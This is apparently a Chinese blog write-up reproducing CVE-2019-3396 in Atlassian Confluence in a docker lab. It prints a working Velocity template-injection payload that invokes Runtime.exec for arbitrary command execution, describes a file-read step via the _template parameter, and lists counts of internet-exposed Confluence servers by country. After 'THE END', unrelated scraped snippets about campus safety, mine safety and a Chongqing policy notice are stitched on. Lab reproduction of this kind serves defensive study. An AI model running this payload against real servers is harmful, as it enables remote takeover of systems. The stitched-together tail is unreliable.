CVE20193396(AtlassianConfluence路径穿越与命令执行漏洞)toby123

2.影响版本:6.6.12之前所有6.6.x版本,6.12.3之前所有6.12.x版本,6.13.13之前所有6.13.x版本,6.14.2之前所有6.14.x版本。

3.漏洞产生原因:

参考资料:

执行如下命令启动一个ConfluenceServer6.10.2:

docker-composeup-d

如果提示填写clusternode,路径填写`/home/confluence`即可:

后续可能要求你填写数据库账号密码,选择postgres数据库,地址为`db`,账号密码均为`postgres`:

点击预览功能时发的包里并没有_template参数,需要手动加上。猜想这个漏洞应该是需要白盒审计才能发现吧。修改请求中_template参数的值,即可实现本地文件包含,发送如下数据包,即可读取文件`web.xml`:

在开启ftp的当前目录下写入r.vm文件

#set($exp="exp")#set($a=$exp.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec($command))#set($input=$exp.getClass().forName("java.lang.Process").getMethod("getInputStream").invoke($a))#set($sc=$exp.getClass().forName("java.util.Scanner"))#set($constructor=$sc.getDeclaredConstructor($exp.getClass().forName("java.io.InputStream")))#set($scan=$constructor.newInstance($input).useDelimiter("\\A"))#if($scan.hasNext())$scan.next()#end

该文件是一个Velocity模板,我们可以通过模板注入(SSTI)来执行任意命令:

官方已修复该漏洞,下载最新版的比对补丁,发现在com\atlassian\confluence\extra\widgetconnector\WidgetMacro.java里面多了一个过滤,这个应该就是这个漏洞最关键的地方。

根据FOFA的数据统计,全球共有78158个Confluence开放服务,美国最多,有23002个服务,德国第二,有14385个开放服务,中国第三,有7281个服务,澳大利亚第四,有7959个服务,爱尔兰第五,有2893个服务。

全国的开放的Confluence服务中,浙江最多,有3040个服务,北京第二,有1713个服务,上海第三,有532个服务,广东第四,有525个服务。

根据ZoomEye网络空间搜索引擎对关键字"X-Confluence"进行搜索,共得到61,856条结果,主要分布美国、德国、中国等国家。

THE END
1.命令执行漏洞全面解析一、漏洞概述 命令执行漏洞是指攻击者能够在目标系统上执行任意操作系统命令的安全漏洞。这种漏洞一旦被利用,攻击者可以获取敏感信息、篡改系统配置、甚至完全控制目标系统,对系统安全构成严重威胁。 二、常见漏洞场景 Web 应用程序 许多Web 应用程序在处理用户输入时,如果没有对输入进行严格的过滤和验证,就可能将用户输入https://blog.csdn.net/m0_57836225/article/details/144331272
2.大学生安全知识三大学生中发生纠纷的原因主要有:(1)不拘小节;(2)开玩笑过分或刻意挖苦别人;(3)互相猜疑;(4)骂人或不尊重别人;(5)妒忌他人;(6)不谦虚,狂妄自大,目中无人;(7)极端利己,不容他人,争强好胜;(8)酗酒后寻衅滋事等。 其表现形式主要是两种: 一是争吵斗嘴,互相攻击、谩骂。 https://www.qztc.edu.cn/bwc/2009/0707/c949a32303/pagem.htm
3.矿山安全知识问答11、《矿山安全法》规定的有特殊安全要求的设备、器材、防护用品和安全检测仪器有哪些? 答:《矿山安全法》第十五条中指出的有特殊安全要求的设备、器材、防护用品和安全检测仪器是指采掘设备、装载设备、运输设备、提升设备、支护设备、压缩空气设备、电动机、变压器、电控装置、配电柜、电器开关及各种设备的安全保护装置https://www.safehoo.com/item/12903_8.aspx
4.重庆市政府114号文件解读为贯彻落实党中央、国务院公共资源交易监管改革要求,市委、市政府紧扣营商环境优化提升,针对中央巡视和中央巡视“回头看”反馈的我市公共资源交易领域突出问题,以及近年来我市公共资源交易监管职能分散、制度不完善、交易乱象较多、交易中腐败现象易发等问题,着力补短板、强弱项、堵漏洞,切实解决难点、堵点、痛点问题,作出https://www.cqggzy.com/wushanweb/tzgg/001001/20200717/e769be99-50d7-4d66-bff6-59df47bcfdf0.html